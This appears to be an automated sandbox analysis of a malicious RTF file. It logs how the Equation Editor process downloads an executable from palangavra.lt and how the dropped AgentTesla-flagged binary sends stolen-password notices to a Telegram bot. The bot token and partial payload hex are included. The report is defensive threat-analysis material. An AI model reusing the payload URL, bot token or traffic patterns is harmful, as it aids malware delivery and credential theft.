                                                                                SHA256:8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
                                                                                SHA512:3d68cde4050df2c0b519a237cd122176c7dcbeb8fb93bbdd6d3caa06ffa1fa37c2357822bf0d4f8d76c21050bd303e9d483dc76566c5b5f08ca72c226e56eb2d
                                                                                SSDEEP:384:U/RZbKkaCb3iWkAqF3UuUh/kIkBWsHDvu:UDbKkaOjkX3UuicZMF
                                                                                File Content Preview:{\rtf3212-@#++`598.?6.[?.?!)7[=(+(*./*91%6[%9!|8:=`;%^$*?#;'*6[13)_<#'.^&.#~&,_2(/;40?5../,;@^%0-^^-<67*08&/5<;[~/=$5&3:*%`1.5$->[*?-8`95?/'%.7(<51@.#^?3![!''9%%%~?]?9!|%3*0+[.2??0)+|-&_&(%.0:%0.4%+4[-.?-36%-8'?.)?.-=)2!0.[6.9+1.=70<`%.+4`>#(.9#2?^3-5>2=0

                                                                                File Icon

                                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                                Static RTF Info

                                                                                Objects

                                                                                 Id  Start      Format ID  Format  Classname  Datasize  Filename  Sourcepath  Temppath  Exploit
                                                                                 0   0000033Bh                                                                          no
                                                                                 1   000002F8h                                                                          no

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                 Timestamp                 Protocol  SID  Message                                                        Source Port  Dest Port  Source IP  Dest IP
                                                                                 10/14/21-10:24:56.289135  UDP       254  DNS SPOOF query response with TTL of 1 min. and no authority  53           50591      8.8.8.8    192.168.2.22

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                 Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                                                                 Oct 14, 2021 10:22:59.049212933 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.071090937 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.071178913 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.071497917 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.093384981 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.100934982 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101012945 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101016045 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101056099 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101078987 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101115942 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101130962 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101166010 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101185083 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101238966 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101269007 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101285934 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101289034 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101325989 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101342916 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101380110 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101458073 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101511002 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.101537943 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.101578951 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.110775948 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123496056 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123564959 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123619080 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123620033 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123667955 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123675108 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123676062 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123725891 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123728991 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123778105 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123780966 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123828888 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123831034 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123872995 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123892069 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123939037 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123944998 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.123989105 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.123995066 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124041080 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124047041 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124090910 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124097109 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124140978 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124145985 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124191046 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124197960 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124241114 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124247074 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124288082 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124305964 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124349117 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124360085 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124383926 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124396086 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124411106 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124453068 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124461889 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124505043 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.124519110 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.124561071 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.125000954 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146296978 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146351099 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146385908 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146388054 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146419048 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146425962 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146425962 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146476984 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146478891 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146513939 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146521091 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146552086 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146558046 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146589994 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146605968 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146636963 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146642923 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146680117 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146688938 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146717072 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146728992 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146754980 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146768093 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146794081 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146801949 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146830082 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146845102 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146867037 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146879911 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146904945 CEST  80           49167      144.76.47.167  192.168.2.22
                                                                                 Oct 14, 2021 10:22:59.146919012 CEST  49167        80         192.168.2.22   144.76.47.167
                                                                                 Oct 14, 2021 10:22:59.146951914 CEST  49167        80         192.168.2.22   144.76.47.167

                                                                                UDP Packets

                                                                                 Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                                                 Oct 14, 2021 10:22:58.987952948 CEST  52167        53         192.168.2.22  8.8.8.8
                                                                                 Oct 14, 2021 10:22:59.023015022 CEST  53           52167      8.8.8.8       192.168.2.22
                                                                                 Oct 14, 2021 10:24:56.252165079 CEST  50591        53         192.168.2.22  8.8.8.8
                                                                                 Oct 14, 2021 10:24:56.270032883 CEST  53           50591      8.8.8.8       192.168.2.22
                                                                                 Oct 14, 2021 10:24:56.270914078 CEST  50591        53         192.168.2.22  8.8.8.8
                                                                                 Oct 14, 2021 10:24:56.289134979 CEST  53           50591      8.8.8.8       192.168.2.22

                                                                                DNS Queries

                                                                                 Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name              Type            Class
                                                                                 Oct 14, 2021 10:22:58.987952948 CEST  192.168.2.22  8.8.8.8  0x8ff9    Standard query (0)  palangavra.lt     A (IP address)  IN (0x0001)
                                                                                 Oct 14, 2021 10:24:56.252165079 CEST  192.168.2.22  8.8.8.8  0x3162    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)
                                                                                 Oct 14, 2021 10:24:56.270914078 CEST  192.168.2.22  8.8.8.8  0x3162    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)

                                                                                DNS Answers

                                                                                 Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name              CName  Address          Type            Class
                                                                                 Oct 14, 2021 10:22:59.023015022 CEST  8.8.8.8    192.168.2.22  0x8ff9    No error (0)  palangavra.lt            144.76.47.167    A (IP address)  IN (0x0001)
                                                                                 Oct 14, 2021 10:24:56.270032883 CEST  8.8.8.8    192.168.2.22  0x3162    No error (0)  api.telegram.org         149.154.167.220  A (IP address)  IN (0x0001)
                                                                                 Oct 14, 2021 10:24:56.289134979 CEST  8.8.8.8    192.168.2.22  0x3162    No error (0)  api.telegram.org         149.154.167.220  A (IP address)  IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • api.telegram.org
                                                                                • palangavra.lt

                                                                                HTTP Packets

                                                                                 Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
                                                                                 0           192.168.2.22  49169        149.154.167.220  443               C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                 Timestamp  kBytes transferred  Direction  Data


                                                                                 Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                                 1           192.168.2.22  49167        144.76.47.167   80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                 Timestamp  kBytes transferred  Direction  Data
                                                                                 Oct 14, 2021 10:22:59.071497917 CEST  0  OUT  GET /jukiestay/gufoxqa.exe HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: palangavra.lt
                                                                                Connection: Keep-Alive
                                                                                 Oct 14, 2021 10:22:59.100934982 CEST  2  IN  HTTP/1.1 200 OK
                                                                                Date: Thu, 14 Oct 2021 08:22:59 GMT
                                                                                Server: Apache
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, Keep-Alive
                                                                                Last-Modified: Thu, 14 Oct 2021 01:10:12 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 486912
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Content-Type: application/x-msdownload
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 82 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 a4 e7 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 73 07 00 53 00 00 00 00 80 07 00 d4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 90 a8 06 00 58 cb 00 00 02 00 00 00 5c 00 00 06 b0 45 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 
28 0d 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 08 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 0d 01 00 06 72 f3 45 00 70 7e 3d 00 00 04 02 28 0d 01 00 06 28 13 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 00 01 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 0d 01 00 06 72 f7 45 00 70 7e 42 00 00 04 72 09 46 00 70 7e 41 00 00 04 02 28 16 01 00 06 8c 64 00 00 01 28 19 01 00 06 28 13 01 00 06 2a 3e 02 04 28 4f 00 00 06 02 03 7d aa 00 00 04 2a 3e 02 7b aa 00 00 04 02 7b aa 00 00 04 5a 6c 2a 3e 02 04 28 4f 00 00 06 02 03 7d ab 00 00 04 2a 66 02 7b ab 00 00 04 02 7b ab 00 00 04 5a 6c 23 18 2d 44 54 fb 21 09 40 5a 2a 5a 02 05 28 4f 00 00 06 02 03 7d ac 00 00 04 02 04 7d ad 00 00 04 2a 3e 02 7b ac 00 00 04 02 7b ad 00 00 04 5a 6c 2a 32 7e 98 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgaV>t @ @sS H.textDT V `.rsrcX@@.relocl@B tHX\EbIvan Medvedev2~'(*(*2~5(*{*"}*{*"}*{*"}*R~;({*{*"}*{*"}*{*"}*~>~<(rEp~=((*{*"}*{*"}*N(~?(*{*"}*~>~@(rEp~BrFp~A(d((*>(O}*>{{Zl*>(O}*f{{Zl#-DT!@Z*Z(O}}*>{{Zl*2~


                                                                                HTTPS Proxied Packets

                                                                                 Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
                                                                                 0           192.168.2.22  49169        149.154.167.220  443               C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                 Timestamp  kBytes transferred  Direction  Data
                                                                                 2021-10-14 08:24:56 UTC  0  OUT  POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2
                                                                                Host: api.telegram.org
                                                                                Content-Length: 1018
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                2021-10-14 08:24:56 UTC0INHTTP/1.1 100 Continue
                                                                                2021-10-14 08:24:56 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 32 35 63 66 65 38 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 36 36 37 30 36 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 32 35 63 66 65 38 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 35 37 39 35 36 39 0a 4f 53 46 75 6c 6c
                                                                                Data Ascii: -----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="chat_id"1366706404-----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/579569OSFull
                                                                                2021-10-14 08:24:56 UTC1INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Thu, 14 Oct 2021 08:24:56 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 656
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":3749,"from":{"id":2034238293,"is_bot":true,"first_name":"takership","username":"takership_bot"},"chat":{"id":1366706404,"first_name":"\u627f\u529e\u4eba","last_name":"taker","username":"dtaker","type":"private"},"date":1634199896,"document":{"file_name":"user-579569 2021-10-14 02-52-20.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIOpWFn6Vjq-3ycowABiEmEbyiu600j-gACwwgAAnGTQVMHP73qYkATfSEE","file_unique_id":"AgADwwgAAnGTQVM","file_size":439},"caption":"New PW Recovered!\n\nUser Name: user/579569\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                System Behavior

                                                                                General

                                                                                Start time:10:22:14
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                Imagebase:0x13fbe0000
                                                                                File size:1423704 bytes
                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:10:22:15
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                Imagebase:0x400000
                                                                                File size:543304 bytes
                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:10:22:17
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low

                                                                                General

                                                                                Start time:10:22:42
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Disassembly

                                                                                Code Analysis